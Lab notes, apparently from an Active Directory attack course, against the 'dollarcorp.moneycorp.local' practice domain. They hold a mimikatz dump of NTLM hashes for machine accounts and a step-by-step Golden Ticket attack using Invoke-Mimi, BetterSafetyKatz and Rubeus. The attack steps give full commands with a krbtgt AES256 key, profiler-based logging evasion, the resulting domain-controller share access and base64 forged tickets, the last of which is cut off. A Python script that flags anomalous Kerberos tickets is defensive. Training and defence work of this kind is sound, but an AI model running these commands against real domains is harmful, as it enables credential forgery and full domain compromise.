RID : 000003e8 (1000)


User : DCORP-DC$
LM :
NTLM : 81a9ccc2f44b988af78448ad78297ad5

RID : 00000451 (1105)


User : DCORP-ADMINSRV$
LM :
NTLM : b5f451985fd34d58d5120816d31b5565

RID : 00000452 (1106)


User : DCORP-APPSRV$
LM :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID : 00000453 (1107)


User : DCORP-CI$
LM :
NTLM : f76f48c176dc09cfd5765843c32809f3

RID : 00000454 (1108)


User : DCORP-MGMT$
LM :
NTLM : 0878da540f45b31b974f73312c18e754

RID : 00000455 (1109)


User : DCORP-MSSQL$
LM :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID : 00000456 (1110)


User : DCORP-SQL1$
LM :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID : 0000106a (4202)


User : DCORP-STDADMIN$
LM :
NTLM : 323e49189b1edbea4a323142017328cb

RID : 00003571 (13681)


User : DCORP-STD161$
LM :
NTLM : 9ef9daa7b4bc99ab3e4121f2abd037c7

RID : 00003572 (13682)


User : DCORP-STD162$
LM :
NTLM : 354a9b4320a227e36d82c19f92851f5b

RID : 00003573 (13683)


User : DCORP-STD163$
LM :
NTLM : 75e1e5ec9a9f15290d40cd1b04fede35

RID : 00003574 (13684)


User : DCORP-STD164$
LM :
NTLM : 9fa111e9828fcb2a53d01dcf8133cc0d

RID : 00003575 (13685)


User : DCORP-STD165$
LM :
NTLM : 565d99510bbbe8fb3e4fa5c9c2120bc5

RID : 00003576 (13686)


User : DCORP-STD166$
LM :
NTLM : 1ab7d20a96b7b4b34e0c806b7631ad8e

RID : 00003577 (13687)


User : DCORP-STD168$
LM :
NTLM : 313fc2c203e17c1a63554c88e090c205

RID : 00003578 (13688)


User : DCORP-STD167$
LM :
NTLM : 69a450cb407f22862f946f22d20db2c2

RID : 00003579 (13689)


User : DCORP-STD169$
LM :
NTLM : ceeab9f5c7798eb9034512934ec115a8

RID : 0000357a (13690)


User : DCORP-STD170$
LM :
NTLM : 1d24dfc4057c69f71576c0cc1e862a17

RID : 0000357b (13691)


User : DCORP-STD171$
LM :
NTLM : 84d9394ef97f221290f257059e8086d0

RID : 0000357c (13692)


User : DCORP-STD172$
LM :
NTLM : 49cc46d9ea5e322232497c21f808ff88

RID : 0000357d (13693)


User : DCORP-STD173$
LM :
NTLM : 323a672db50f9467fde4368c6a60c8d8

RID : 0000357e (13694)


User : DCORP-STD174$
LM :
NTLM : b642781c290b8550a2e9b2661cf87654

RID : 0000357f (13695)


User : DCORP-STD175$
LM :
NTLM : 57f3d186ece9047624b82015fab8d00e

RID : 00003580 (13696)


User : DCORP-STD176$
LM :
NTLM : 79207f3a25b685aa97ea1b34aef53fef

RID : 00003581 (13697)


User : DCORP-STD177$
LM :
NTLM : 2979ebc70dd459e65f8ac3e998aed6b1

RID : 00003582 (13698)


User : DCORP-STD178$
LM :
NTLM : 956164515f0459ea114452437d5ea4d7

RID : 00003583 (13699)


User : DCORP-STD180$
LM :
NTLM : 459c493625fe5994ff309debff15f163

RID : 00003584 (13700)


User : DCORP-STD179$
LM :
NTLM : c9b2183c974b57b61d873026a4443688
RID : 0000044f (1103)
User : mcorp$
LM :
NTLM : a8f73b279dc7257c7a8a2d0c911043d2

RID : 00000450 (1104)


User : US$
LM :
NTLM : 24bfaf8b2a2c17a562ff08f8cf56374f

RID : 00000458 (1112)


User : ecorp$
LM :
NTLM : 60774dcb2e1f27d7a289147ebe2d90c1

mimikatz(commandline) # exit
Bye!

Golden Ticket Attack


A Golden Ticket attack is a powerful technique in which an attacker forges a Kerberos Ticket Granting Ticket (TGT).
The forged TGT allows the attacker to gain unrestricted access to any service within an Active Directory (AD)
environment. A golden ticket is signed and encrypted with the key (hash) of the KRBTGT account, which is what
makes it a valid TGT. The krbtgt hash can therefore be used to impersonate any user with any privileges, even
from a machine that is not joined to the domain.

Execution
Once we extract the KRBTGT key, either the NTLM hash or the AES key, we can use it to impersonate any user in the
domain and access any service in the domain.

Using Invoke-Mimi
When the AES256 key of the krbtgt account is used, the command is as follows:
Invoke-Mimi -Command '"kerberos::golden /User:<user to impersonate> /domain:<Domain Name>
/sid:<Domain SID> /aes256:<AES256 key of the krbtgt account> /startoffset:0
/endin:<Ticket lifetime in minutes> /renewmax:<Renewal time in minutes> /ptt"'

Note: The ticket lifetime and renewal time should be in accordance with the domain Kerberos policy. If
we use the mimikatz default values, the ticket is considered an anomaly and is easily detected.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Get-DomainSID
S-1-5-21-719815819-3726368948-3917688648
PS C:\Windows\system32> (Get-DomainPolicyData).KerberosPolicy

MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1

PS C:\Windows\system32> ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
ls : Access is denied
At line:1 char:1
+ ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\dcorp-dc.doll...ycorp.local\C$\:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

ls : Cannot find path '\\dcorp-dc.dollarcorp.moneycorp.local\C$\' because it does not exist.


At line:1 char:1
+ ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\dcorp-dc.doll...ycorp.local\C$\:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

Running the Golden Ticket attack:


PS C:\Windows\system32> Invoke-Mimi -Command '"kerberos::golden /User:Administrator
/domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500 /groups:512
/startoffset:0 /endin:600 /renewmax:10080 /ptt"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-719815819-3726368948-3917688648
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500 /groups:512
/startoffset:0 /endin:600 /renewmax:10080 /ptt
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *512
ServiceKey: 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 - aes256_hmac
Lifetime : 6/28/2024 4:33:03 AM ; 6/28/2024 2:33:03 PM ; 7/5/2024 4:33:03 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ dollarcorp.moneycorp.local' successfully submitted for current session

PS C:\Windows\system32> klist

Current LogonId is 0:0x1a49c2

Cached Tickets: (1)

#0> Client: Administrator @ dollarcorp.moneycorp.local


Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 6/28/2024 5:05:27 (local)
End Time: 6/28/2024 15:05:27 (local)
Renew Time: 7/5/2024 5:05:27 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

PS C:\Windows\system32> ls \\dcorp-dc\C$\

Directory: \\dcorp-dc\C$

Mode LastWriteTime Length Name


---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 11/14/2022 10:12 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 5/18/2024 1:32 AM Users
d----- 1/10/2024 12:59 AM Windows

Klist

The klist command in Windows lists the Kerberos tickets cached in the current logon session. Here, when we run
klist, we can see that a KRBTGT and an LDAP TGS have been generated and stored in the session.
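The note above says that a ticket whose lifetime does not match the domain Kerberos policy is an easy anomaly to spot, and the klist output above shows what an injected ticket looks like in the cache. The following is an added example, not code from the lab notes: a Python audit that parses klist output in the format shown on this page and flags tickets whose lifetime or renewal window exceeds the policy values printed by Get-DomainPolicyData above (MaxTicketAge 10 hours, MaxRenewAge 7 days), or that have an empty "Kdc Called" field. The sample klist text is constructed; ticket #0 mirrors the page, #1 uses a ten-year lifetime, #2 is a normally requested TGT.

```python
"""Audit klist output against the domain Kerberos policy.

Added example (not part of the original lab notes). Parses the klist format
shown on the page and reports tickets that exceed MaxTicketAge / MaxRenewAge
or that record no KDC, which is what an injected (/ptt) ticket looks like.
"""
import re
from datetime import datetime

# Policy values as printed by (Get-DomainPolicyData).KerberosPolicy on the page.
POLICY = {"MaxTicketAge": 10, "MaxRenewAge": 7}   # hours, days

NO_KDC = "no KDC recorded: ticket was injected into the cache, not issued by a DC"

# Constructed klist output (not captured from a real host).
SAMPLE_KLIST = """\
Current LogonId is 0:0x1a49c2

Cached Tickets: (3)

#0>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 6/28/2024 5:05:27 (local)
        End Time:   6/28/2024 15:05:27 (local)
        Renew Time: 7/5/2024 5:05:27 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 6/28/2024 5:05:27 (local)
        End Time:   6/26/2034 5:05:27 (local)
        Renew Time: 6/26/2034 5:05:27 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#2>     Client: student161 @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 6/28/2024 5:00:00 (local)
        End Time:   6/28/2024 15:00:00 (local)
        Renew Time: 7/5/2024 5:00:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: dcorp-dc.dollarcorp.moneycorp.local
"""

TICKET_RE = re.compile(r"^#(\d+)>\s+Client:\s+(.+)$")
TIME_RE = re.compile(r"^(Start|End|Renew) Time:\s+(\d+/\d+/\d+ \d+:\d+:\d+)")


def parse_klist(text):
    """Return one dict per cached ticket: index, client, server, times, kdc."""
    tickets, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = TICKET_RE.match(line)
        if m:
            cur = {"index": int(m.group(1)), "client": m.group(2).strip(),
                   "server": "", "kdc": ""}
            tickets.append(cur)
            continue
        if cur is None:
            continue
        m = TIME_RE.match(line)
        if m:
            cur[m.group(1).lower()] = datetime.strptime(m.group(2), "%m/%d/%Y %H:%M:%S")
        elif line.startswith("Server:"):
            cur["server"] = line.split(":", 1)[1].strip()
        elif line.startswith("Kdc Called:"):
            cur["kdc"] = line.split(":", 1)[1].strip()
    return tickets


def audit_ticket(t, policy=POLICY):
    """Findings for one ticket; an empty list means nothing unusual."""
    findings = []
    if all(k in t for k in ("start", "end", "renew")):
        life_h = (t["end"] - t["start"]).total_seconds() / 3600
        renew_d = (t["renew"] - t["start"]).total_seconds() / 86400
        if life_h > policy["MaxTicketAge"]:
            findings.append(f"lifetime {life_h:.0f}h exceeds MaxTicketAge {policy['MaxTicketAge']}h")
        if renew_d > policy["MaxRenewAge"]:
            findings.append(f"renewal {renew_d:.0f}d exceeds MaxRenewAge {policy['MaxRenewAge']}d")
    if not t["kdc"]:
        findings.append(NO_KDC)
    return findings


def audit_klist(text, policy=POLICY):
    """Map '#<n> <client>' to the findings for that cached ticket."""
    return {f"#{t['index']} {t['client']}": audit_ticket(t, policy) for t in parse_klist(text)}


if __name__ == "__main__":
    for name, findings in audit_klist(SAMPLE_KLIST).items():
        print(name, "OK" if not findings else "; ".join(findings))
```

Run it over the output of `klist` collected from endpoints (for example via a scheduled task or EDR script) rather than on the attacker's own session; the policy values should be read from the domain rather than hard-coded when the tool is deployed.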

Using BetterSafetyKatz
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> ls \\dcorp-dc\C$\
ls : Access is denied
At line:1 char:1
+ ls \\dcorp-dc\C$\
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\dcorp-dc\C$\:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

ls : Cannot find path '\\dcorp-dc\C$\' because it does not exist.


At line:1 char:1
+ ls \\dcorp-dc\C$\
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\dcorp-dc\C$\:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

PS C:\Windows\system32> C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe "kerberos::golden


/User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500
/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-719815819-3726368948-3917688648
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500 /groups:512
/startoffset:0 /endin:600 /renewmax:10080 /ptt
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *512
ServiceKey: 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 - aes256_hmac
Lifetime : 6/28/2024 5:05:27 AM ; 6/28/2024 3:05:27 PM ; 7/5/2024 5:05:27 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'Administrator @ dollarcorp.moneycorp.local' successfully submitted for current session

mimikatz(commandline) # exit
Bye!
PS C:\Windows\system32> klist

Current LogonId is 0:0x1a49c2


Cached Tickets: (1)

#0> Client: Administrator @ dollarcorp.moneycorp.local


Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 6/28/2024 5:05:27 (local)
End Time: 6/28/2024 15:05:27 (local)
Renew Time: 7/5/2024 5:05:27 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
PS C:\Windows\system32> ls \\dcorp-dc\C$\

Directory: \\dcorp-dc\C$

Mode LastWriteTime Length Name


---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 11/14/2022 10:12 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 5/18/2024 1:32 AM Users
d----- 1/10/2024 12:59 AM Windows

Using Rubeus
With Rubeus, we can generate an OPSEC-friendly command for a golden ticket. With the /ldap option, 3 LDAP queries
are sent to the DC to retrieve the required information (the user's attributes, group membership, domain policy
and NetBIOS name, as seen in the output below), so the forged ticket carries the same values a real one would.

Generating OPSEC friendly command:


C:\AD\Tools\Rubeus.exe golden /aes256:<AES256 key of the krbtgt account> /sid:<domain sid> /ldap /user:<user to
impersonate> /printcmd

C:\Windows\system32>C:\AD\Tools\Rubeus.exe golden
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /sid:S-1-5-21-719815819-
3726368948-3917688648 /ldap /user:Administrator /printcmd

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Build TGT

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Built
in,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-
513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[*] \\us.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\us.dollarcorp.moneycorp.local\SYSVOL
[*] \\us.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator
Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN
=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-
1806204659-513))'
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)


[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : dollarcorp.moneycorp.local

[*] Generating EncTicketPart


[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for '[email protected]'

[*] AuthTime : 6/28/2024 5:35:28 AM


[*] StartTime : 6/28/2024 5:35:28 AM
[*] EndTime : 6/28/2024 3:35:28 PM
[*] RenewTill : 7/5/2024 5:35:28 AM

[*] base64(ticket.kirbi):

doIGJDCCBiCgAwIBBaEDAgEWooIE3jCCBNphggTWMIIE0qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BHowggR2oAMCARKhAwIBA6KCBGgEggRk0LgSdq+jiCQICB+HqMaCRtaZZoi7/yV7EiLtqb7maWiy7GAV
p7U6aT3N/TgqqK/OjjMG9V3zAC7nwzdOUP8YTNLOCy7zo4HGSSHFYKM4M5Zv1o0/qHmhCSMvVIsbI0WQ
ClEoVetkAMx2d25c8DI01UOjEMnXKAPKbejbXeY+DVLxN7rZQcYdOcRLDYtyEx3XSFfS5FdSp04ejL/z
mLXJbxf+E32fzHO3bL321vr+PR0T4iKGVLQrIHF3lV06je6MT8g9Y0UEUgpu+rJwF4fsLM+FHb6dre3Y
s16alH7HTHa7IxpL/grxYSek28Z8uGqUP6+liXhVSC6WG81CFY/ETCySyZBERCaYZrozBhlDLg/4LTmR
awyOT/7okTm71CwhtBol/qzoEH2ZhdCJq7gFFdXqf2GIfbmrE7BaQ6SsguPluIeMDsiY8G5M9VC0gUwM
hiwOs5AuiQqvGvs4c8+fNYCj5wbSv2XkKhAHhwRg10LbMoaFsKC5u8ivVj7sJddSCh1ajypGQAeyMU0B
MCF/r+mHIVH6Qkif6b6GYl/wMfTf+7OZISkBOJ53C6rUnGEPxTs0r0QvJWv3ycPLqXhrEA8SGZKpxGPy
9xX41h92l3FrVdObv+vmaTPCJtQqCzfBV96Y3sAaJjxbLXCKnUFzVMj/SBUtgi3cLsoc5QtnEdm1Ijuj
Mb/C9iqQYxYT1rPd2XJG927axcDqNDS8HOvXVto0y35CyWfBqRT7r4w2Xa6xpLhCJamaU8y8JC0nuioq
eiopWXL28Wc3NmaHbp9fxs5LFZ5TdmiAC/WB3nTq+WNYYdgv9SpbiXSv/Oz9qo1m7uzXAKLTx9t9AGHz
50Zyz0br63fYaR3WdJNhNAG1uoHZTq73D+KPlBvqaagHNFCahonXnz6AM4weJMbtM5/ztIc0dxmfHtYG
zhqSHK4paP3soii7IIsSrZFCXxYNJ1AsaEh9hiZW2sZfCE49G0KKh1OcaeqGwZyWFhwk/J71Vp4xzJJU
C+VJj2u00bzMAIET44JiBTf57SzotS+e+fEellGDVz1ehgifa4g8/6tTb/iaDyYnLnaJkhfDn6WAKLnR
Hbs3ziosGcRES/KFo8XHIrblNboSvbtxTde3t9C7nSjkIKBqi7/4ZneU/oVHgqs+sHIQp+fP6ff7g6mr
WDPt84QE7x4dQheTUjExwlj71l8t33KOalMcp1ttbG2HAShbgqnsV2iYDi59VtvIg2inl5tVTP8svRnw
bqNzR5848efE3LPxE8kWe5AcnpXcsxtuezTa9tbEgsscznzkFraxKbc6NNivMtsWTueD6mMDvw8qoCAL
XPnPsYntW/6ZkijA2Dgz4c2zDdjUEwoLEjct9HcK88JxPU2xsUrcStiY0FNDK2ecW7SPmX1gQjmLfjl2
K64v4f22BkiKBxO2HSMdZD5YDwLfMN6f9km+/PCMVtCTJXOk4n6gIRquIYEOdDpd0DfoK6R3/I867cTA
aC6gjj9IjVOjggEwMIIBLKADAgEAooIBIwSCAR99ggEbMIIBF6CCARMwggEPMIIBC6ArMCmgAwIBEqEi
BCAbXLwCDWyi8Gyporav9zGzf2ixCpOxxQTr+hArmhZ7CaEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5M
T0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEDgAACkERgPMjAyNDA2MjgxMjM1Mjha
pREYDzIwMjQwNjI4MTIzNTI4WqYRGA8yMDI0MDYyODIyMzUyOFqnERgPMjAyNDA3MDUxMjM1MjhaqBwb
GkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3Jw
Lm1vbmV5Y29ycC5sb2NhbA==

[*] Printing a command to recreate a ticket containing the information used within this ticket

C:\AD\Tools\Rubeus.exe golden
/aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator
/id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:190 /netbios:dcorp
/groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local
/uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD

We can execute the printed command to forge a golden ticket. To inject the ticket into the current session
we add the /ptt parameter.
C:\Windows\system32>dir \\dcorp-dc\C$\
Access is denied.

C:\Windows\system32>C:\AD\Tools\Rubeus.exe golden
/aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator
/id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:190 /netbios:dcorp
/groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local
/uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1
[*] Action: Build TGT

[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)


[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : dollarcorp.moneycorp.local

[*] Generating EncTicketPart


[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for '[email protected]'

[*] AuthTime : 6/28/2024 5:41:26 AM


[*] StartTime : 6/28/2024 5:41:26 AM
[*] EndTime : 6/28/2024 3:41:26 PM
[*] RenewTill : 7/5/2024 5:41:26 AM

[*] base64(ticket.kirbi):

doIGJDCCBiCgAwIBBaEDAgEWooIE3jCCBNphggTWMIIE0qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BHowggR2oAMCARKhAwIBA6KCBGgEggRkoM6CEs7jMgBoCoyP/EfANXDtEdlLY03s76N2JlclMM7GYAj1
S+lsFxd5+tpQTqaFFaHodgPfYYGP8sY+Ak/Eb0BghJV/d3XV4hxogJVeUoO/h++QE9D0djkO/YdgTpT5
b/UAJM+fF7BmFyO3tvuIC5AID7bJxu6X1WqosC9PX0+h2WWNBX/ATdsNLota3CJubuNjp2opl5YD70cd
rVUm8VeqiqoVEmMJLvc4O0Tor/FlyMbyq7jKmp42yduVDdg08tRmBvOVJP9Zrmj1gIieMsesnxhNPTUm
